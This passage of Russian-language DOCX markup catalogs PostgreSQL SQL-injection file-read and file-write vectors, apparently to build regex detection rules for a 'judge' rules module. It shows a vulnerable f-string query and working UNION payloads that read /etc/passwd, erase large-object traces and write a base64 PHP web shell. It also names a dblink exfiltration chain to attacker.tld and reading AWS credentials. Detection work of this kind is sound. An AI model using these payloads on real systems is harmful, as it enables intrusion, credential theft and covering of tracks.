        <w:t xml:space="preserve"> — chain для эксфильтрации результата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через OOB-канал, когда HTTP-ответ невидим: обернуть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dblink_connect('host=...' || encode(pg_read_file(...)::bytea, 'hex') || '.attacker.tld ...')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> или эквивалент через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3.7.x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — RCE-цепочки: чтение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">postgresql.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → расположение SSL-keys/extension-libs → подготовка к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY FROM PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">; чтение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">~/.aws/credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → cross-system pivot в облачную инфру.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pg_read_binary_file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app/services/judge/rules.py</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расширить класс </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OOB_EXFILTRATION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (предложенный в 3.6.1) regex-ом </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\b(pg_read_file|pg_read_binary_file|pg_read_server_files)\s*\(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — добавить как третью ветку в ту же regex-проверку, что и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">dblink_*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (3.6.1) и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE\s+SERVER|postgres_fdw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (3.6.2). Базовый риск 9. В саммари 3.6 будет сводный regex со всеми четырьмя ветками (включая 3.6.4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Information Functions — pg_read_file / pg_read_binary_file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Predefined Roles — pg_read_server_files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File-System Level Backup (контекст data_directory)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file read (pg_read_file)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — R4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section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Source: src/backend/utils/adt/genfile.c (реализация pg_read_file / pg_read_binary_file)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.6.4 lo_import / lo_export — OID-based file-read и единственный write-вектор в 3.6</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lo_import(path)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> копирует файл с ФС в PostgreSQL large object (returns OID), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">lo_get(oid)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> извлекает содержимое OID как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lo_export(oid, path)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> пишет LO обратно в файл на ФС. Двухшаговая семантика (OID как промежуточное состояние) — наследие исторического large-object API. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">`lo_export` — единственный write-вектор во всей категории 3.6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: 3.6.1/3.6.2/3.6.3 — read-only.</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app/api/v1/orders.py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@router.get("/orders")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def list_orders(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    status: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f"SELECT id, total, status FROM orders WHERE status = '{status}'"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status</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Три колонки SELECT: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">id 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total numeric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status text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. UNION-инъекция тривиальна — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">oid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> приводится к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">numeric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encode()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оба попадают в свои позиции.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload A — двухшаговый (отдельные запросы)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Между двумя запросами OID нужно вытащить из ответа первого. Полезно для интерактивной инъекции (Burp Repeater, ручной перебор), когда payload-форма ограничена длиной (короче чем nested-вариант в Payload B), и когда атакующий хочет иметь возможность вызвать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">lo_unlink</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для очистки следов.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Шаг 1 — Payload (подставляется вместо `status`):</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lo_import('/etc/passwd')::numeric, ''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total, status FROM orders WHERE status = 'x'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT 0, lo_import('/etc/passwd')::numeric, ''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total</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP-ответа атакующий получает OID нового LO — например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">16384</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Этот OID идёт в шаг 2.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Шаг 2 — Payload (подставляется вместо `status`, с OID из шага 1):</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0::numeric, encode(lo_get(16384), 'escape')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total, status FROM orders WHERE status = 'x'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT 0, 0::numeric, encode(lo_get(16384), 'escape')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status</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — содержимое </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Опциональная очистка следов: третий запрос с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT lo_unlink(16384)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — удаляет LO из </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_largeobject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> + соответствующую запись из </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_largeobject_metadata</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B — вложенный подзапрос (one-shot)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pP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lo_get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — обычные SQL-функции, выполняются в одном expression-context. OID, возвращаемый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передаётся в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">lo_get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> без промежуточного состояния в клиенте. Эффективнее для blind/automated сценариев (SQLMap, скрипты). Цена — LO остаётся в каталоге как артефакт (см. «Легитимность»).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload (подставляется вместо `status`):</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0::numeric, encode(lo_get(lo_import('/etc/passwd')), 'escape')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total, status FROM orders WHERE status = 'x'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT 0, 0::numeric, encode(lo_get(lo_import('/etc/passwd')), 'escape')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status</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — содержимое </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> одним запросом. OID не виден наружу — что закрывает возможность сделать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">lo_unlink</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (для cleanup нужно знать OID).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload C — file-write через lo_export</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Две техники в одном Payload-разделе: (a) копирование существующего файла через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">lo_export(lo_import(...), dst)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — простейший случай, переносит файл откуда есть read-доступ туда где есть write; (b) запись произвольного контента через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">lo_from_bytea(0, decode('&lt;base64&gt;', 'base64'))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 для web-shell, конфигов, ключей. Все варианты — в одном UNION-выражении.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload — вариант (a), копирование `/etc/passwd` → `/tmp/copy`:</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lo_export(lo_import('/etc/passwd'), '/tmp/copy')::numeric, '' --</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload — вариант (b), запись web-shell в `/var/www/html/shell.php`:</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lo_export(lo_from_bytea(0, decode('PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOyA/Pg==', 'base64')), '/var/www/html/shell.php')::numeric, '' --</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сервер видит (вариант b):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT id, total, status FROM orders WHERE status = 'x'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
